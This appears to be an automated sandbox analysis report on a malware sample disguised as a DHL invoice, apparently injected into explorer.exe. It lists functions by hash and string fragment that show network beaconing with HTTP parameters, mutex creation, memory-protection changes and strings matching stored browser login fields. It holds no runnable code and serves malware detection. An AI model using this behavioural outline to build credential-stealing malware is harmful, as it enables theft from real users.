Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
Instruction ID: 678da6a5d91050a58fdad9f718e64edb17abdaa8d98dd56f23585a82f30275d3
Opcode Fuzzy Hash: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
Instruction Fuzzy Hash: D2514A31A0021ABAEF15EBE8DC89FE977ADEF54700F0404A9E60DA7181E771AA41CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0198B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0198B6BF

Strings

0, xrefs: 0198B66F
0, xrefs: 0198B695
+, xrefs: 0198B65A
-, xrefs: 0198B650

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: e28631a731677418fd59a607b61958cdba4464bee8b80712f67dada553acef22
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 8D81E130E1124A8EEF25BE6CC850BFEBFB9AF45321F1C4519D86BA7691C7349840CB51

Uniqueness

Uniqueness Score: -1.00%

Function 019F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F214F
___swprintf_l.LIBCMT ref: 019F2172

Strings

%%%u, xrefs: 019F2146
]:%u, xrefs: 019F2169
[, xrefs: 019F212B

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
Instruction ID: 52c091a87252181e2fd5cb249b20f67aad219eb6599134a9382153af957730a2
Opcode Fuzzy Hash: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
Instruction Fuzzy Hash: E621337AE10119ABDB11DF69DC40AEE7BEDAF94654F44011AEA19D3240E730DA018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0196F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019B02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019B02BD
RTL: Re-Waiting, xrefs: 019B031E

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
Instruction ID: 05a6c95f6e8dd8a40757bc1b9ef26e12eae00b4e2b7749b96fef3de745f64237
Opcode Fuzzy Hash: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
Instruction Fuzzy Hash: 5FE1EF306087429FD725CF2CD994B6ABBE8BF84314F180A5DF5A98B2E1D734D844CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0197BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 019B7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019B7B7F
RTL: Re-Waiting, xrefs: 019B7BAC

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
Instruction ID: 071465c7b84c4a6fcc1977e491ff12eceaed701049369b6f0b8c437e1d3a79a8
Opcode Fuzzy Hash: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
Instruction Fuzzy Hash: 6F41E2317047069FD724DE29C940B6AB7E9EF89B11F000A1DF95EDB280DB31E5058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0197B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019B728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 019B7294
RTL: Resource at %p, xrefs: 019B72A3
RTL: Re-Waiting, xrefs: 019B72C1

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
Instruction ID: 4f744f56e53120fddc662c30c4f3aca512ea73486686a25442fbe240138f286e
Opcode Fuzzy Hash: 963718d7ab027e94b5b04055e9231c242c29ebf9c8e1a1671cfb43f7b468bffc
Instruction Fuzzy Hash: 3541F031700206ABC724DE69CD81FA6B7A5FFD4B11F100A19F95EAB280DB31E842C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 019F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F238D
___swprintf_l.LIBCMT ref: 019F23B3

Strings

%%%u, xrefs: 019F2384
]:%u, xrefs: 019F23AA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
Instruction ID: c9a836eacd0326184106c82e0403cc920d64c6adda868c4d80ce856481685932
Opcode Fuzzy Hash: 4d404c67786e49aee33fa26b00e39d377cac2e3a1155fdf64fbcb122c70d17ff
Instruction Fuzzy Hash: 16318472A00619AFDB20DF2DCC40BEE77BCEB44611F444559E94DE3200EB70DA448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01987D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01987E8B

Strings

+, xrefs: 01987DE8
-, xrefs: 01987DDD

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 5ad9ca3ae004ad3ae573d18ce675975b2022a84f7fbded479e2dd01e2e1daf13
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 0591B871E002169BDB28FF9DC880ABEBBA9EF44321F74451AE95DE72D1D7309941C721

Uniqueness

Uniqueness Score: -1.00%

Function 01949126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01949191
@, xrefs: 01949175

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
Instruction ID: dfe940a2a40959d84a4c1a8ab170deca3ced959d7272f00eb6318fa637db8cfd
Opcode Fuzzy Hash: 2e204dd2e087b20cd4d84903dcf3b510f2fc6fe78030dee9e47cdcbf37551b0b
Instruction Fuzzy Hash: 20811975D012699BDB35CB54CC44BEEBBB8BB48754F0041EAAA1DB7280D7709E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 019CCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 019CCFBD

Strings

@, xrefs: 019CCF0A
@4Qw@4Qw, xrefs: 019CCFD5, 019CCFDA, 019CCFF1

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: eb5d93269d035e0656ab5b02b3d788e8ee38f7238d78879d09b44ce4eee071a5
Instruction ID: 24e2d6e37f66f87ebf4430a803979a48598d7c9b41692b867e70d4466ef64dc7
Opcode Fuzzy Hash: eb5d93269d035e0656ab5b02b3d788e8ee38f7238d78879d09b44ce4eee071a5
Instruction Fuzzy Hash: CA41AF75900215EFDB21DFA9C840AADBBF8FF94B41F00442EE949EB254E734D901CBA6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4084, Parent PID: 7760COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	16

Executed Functions

Function 0E071F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0E07212E
setsockopt.WS2_32 ref: 0E072830
recv.WS2_32 ref: 0E072859

Strings

dat=, xrefs: 0E072290
&sql, xrefs: 0E072471
: cl, xrefs: 0E072338
Co, xrefs: 0E072323
tion, xrefs: 0E072331
&un=, xrefs: 0E0724F1
&br=, xrefs: 0E072509
GET , xrefs: 0E072318
nnec, xrefs: 0E07232A
ose, xrefs: 0E07233F

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: b677830b0bf3d02e25731e0d53eff36aea4563ca0b8ebdf09f918a6122e4ce01
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: FF528070A18B088BDB69EF68C4947E9B7E1FB54300F504A2EC4DFC7156EE34A946CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E071232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0E071449

Strings

`, xrefs: 0E07141D

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 83c073d979422494792db4156a0bdc6e6b80a02f7b2de48ec312f46c763c9851
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: F2224C70A19A099FCB99DF28C4957AEF7E1FB58301F40462ED49ED3690DB30E852CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E072E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E072E67

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: deef04795357d640a2c115fe3cdcec01c7a35d2d0427a5741956b93b20602c3b
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 3801B530628B484F8784EF6CD480166B7E4FBCD314F000B3EE99AC3254D770C9414742

Uniqueness

Uniqueness Score: -1.00%

Function 0E072E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0E072E67

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: fcfd116f92468b0b14f1373b72dcfea525686fcd629f68cf3437aa4ada0aab2c
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: BF01A234628B884B8B48EB2C94412A6B3E5FBCE314F000B3EE9DAC3250DB21D9024786

Uniqueness

Uniqueness Score: -1.00%

Function 0E06C8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E06C9A0

Strings

User-Agent: , xrefs: 0E06C935, 0E06C948
urlmon.dll, xrefs: 0E06C959
nt: , xrefs: 0E06C91E
on.d, xrefs: 0E06C902

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 36c32afd9367f6c4f238b16dbd716e1b7bcb3f59efae17a9401f21733188aaf4
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 8F31E571A14A0C8FDB44EFA8D8947EEBBE0FF58204F40062AD48ED7250DF788A45C799

Uniqueness

Uniqueness Score: -1.00%

Function 0E06C8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0E06C9A0

Strings

User-Agent: , xrefs: 0E06C935, 0E06C948
urlmon.dll, xrefs: 0E06C959
nt: , xrefs: 0E06C91E
on.d, xrefs: 0E06C902

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 2ca625d83dada57f63f0a33367f5519572d2ad9cab5c2927b04e08a4f60a1648
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 5B21E670A10A4C8BDB44EFA8C8947EEBBF4FF58204F40461AD49AD7250DF788A05C799

Uniqueness

Uniqueness Score: -1.00%

Function 0E068B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E068CCA

Strings

el32, xrefs: 0E068BA0
.dll, xrefs: 0E068BCD
kern, xrefs: 0E068B99

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: b8b88101dc3632d10623bb62e4c9cd3a930aea05a81f257c8f36068c7aa5e943
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 88413C70918A0C8FDB98EFA8C8987ED77E0FF58300F04467AD84ADB255DE349945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0E068B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0E068CCA

Strings

el32, xrefs: 0E068BA0
.dll, xrefs: 0E068BCD
kern, xrefs: 0E068B99

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 1e17ac6bc36969793103ad0889c9cd92c0163cc08d64352f03a2c653c86cf6a3
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: F2413970918A088FDB94EFA8C498BED77E0FF58300F04457AC84ADB255DE349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0E06E72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E06E791

Strings

ect, xrefs: 0E06E761
conn, xrefs: 0E06E75A

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: fae0da60d0b487d07fb61eb65583468d4b33bf4bf5bb6313698951318a8b1fd3
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 58015E30618B188FCB84EF1CE088B55B7E0FB58314F1545AED90DCB266C674CD818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E06E732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0E06E791

Strings

ect, xrefs: 0E06E761
conn, xrefs: 0E06E75A

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 6e2467796204983e0b2900ab987f46068faadb2e689544648b2d101a3972c507
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 94012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1545AEA80DCB266CA74CD828BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0E06E6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0E06E713

Strings

send, xrefs: 0E06E6DA

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: a64f04bcdcc289f9c54e2e1511d232b9ae2b55877657c3f598c872b1fb6907c5
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 2B011270518A188FDBC4EF1CE048B6577E0EB58314F1545AED85DCB266C670DC818B85

Uniqueness

Uniqueness Score: -1.00%

Function 0E06E5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0E06E611

Strings

sock, xrefs: 0E06E5D9

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 5819230b75c6984e6bd38430e53173de53bb0740056a96a69b77e74809895bcf
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 7A0121706186188FCB84EF1CE048B55BBE0FB59354F1545ADE85ECB266C7B0C9828B86

Uniqueness

Uniqueness Score: -1.00%

Function 0E0662DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0E06632D

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 16fdae74e88b5a02fde8dc5deb7d1a9b909e388f00c6da2962c3cef27d31466f
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: C73178B0A14B19DBDBA4AF2990983E9B7E0FB54300F44467EC92D8B116CB32A954CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0E066412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0E066461

Memory Dump Source

Source File: 00000006.00000002.3899090558.000000000E050000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e050000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 447430f08e7dd70e57b63aa6dce0e6cefe0e7a69ebea64873a57bfa091926139
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: B0F0F630668A484FD788EF2CD44567AF3E0FBE8214F450A3EE98DC3264DA39C9824716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0DCDFD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

M, xrefs: 0DCE0082
S, xrefs: 0DCE0073
user, xrefs: 0DCDFF03
wini, xrefs: 0DCDFF72
dll, xrefs: 0DCDFF4C
el32, xrefs: 0DCDFF27
32.d, xrefs: 0DCDFF0B
net., xrefs: 0DCDFF44
kern, xrefs: 0DCDFF5A
.dll, xrefs: 0DCDFF2F
ll, xrefs: 0DCDFF13

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: c789b1d486cc3ba5eeda4fb8e567390577dd9982f139171bb6290f156063d251
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 12E149B4518B4C8FCB64EF68C4847AAB7E0FB58301F514A2E969BC7245DF30E541DB89

Uniqueness

Uniqueness Score: -1.00%

Function 0DCE2792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

ypte, xrefs: 0DCE28A5
rnam, xrefs: 0DCE28B5
name, xrefs: 0DCE287D
encr, xrefs: 0DCE28D2
form, xrefs: 0DCE284D
encr, xrefs: 0DCE289D
dUse, xrefs: 0DCE28AD
e, xrefs: 0DCE28BD
user, xrefs: 0DCE2876
Fiel, xrefs: 0DCE2884
swor, xrefs: 0DCE28EA
Subm, xrefs: 0DCE2855
ypte, xrefs: 0DCE28DA
itUR, xrefs: 0DCE285D
dPas, xrefs: 0DCE28E2
guid, xrefs: 0DCE27CE
d, xrefs: 0DCE28F2

Memory Dump Source

Source File: 00000006.00000002.3898896086.000000000DC60000.00000040.00000001.00040000.00000000.sdmp, Offset: 0DC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_dc60000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 4cad20a5ed7da2720909e1c03811e2efc7b3c18d09ba0353bbdb6e841878d541
